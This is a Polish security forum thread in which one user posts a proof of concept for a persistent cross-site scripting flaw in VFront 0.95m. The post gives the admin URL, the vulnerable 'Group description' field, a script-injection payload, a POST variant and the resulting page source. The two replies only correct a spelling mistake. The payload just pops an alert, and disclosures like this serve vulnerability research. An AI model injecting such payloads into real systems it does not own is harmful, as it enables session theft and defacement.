Pokaż wyniki 1 do 3 z 3

Temat: Persistant XSS in VFront 0.95m (need login)

  1. #1
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie Persistant XSS in VFront 0.95m (need login)

    Kod:
    # exploit title: Persistant XSS in VFront 0.95m (need login)
    # date: 17.o2.2o11
    # author: lemlajt
    # software : VFront
    # version: 0.95m
    # tested on: linux
    # cve : 
    #
    
     
    PoC : 
    Go to:
    http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&modifica_gid&feed=mod_ok
    In "Modify group/registry", we have "Group description".Add here this code:
    ">"><script>alert(2)</script> to make persistant xss.
    
    in other way:
    POST http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&esegui_modifica
    $descrizione_g = ">"><script>alert(2)</script> 
    
    to see whats happen go to:
    http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php
    
    @source:
    <input type="text" name="descrizione_g" id="descrizione_g" value="gruppo di default">"><script>alert(2)</script>" size="80" />
    @source.
    
    
    # *

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    offtopic: pisze sie persistent
    War, war never changes.

  3. #3
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    Dzięki, literówka ;-)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52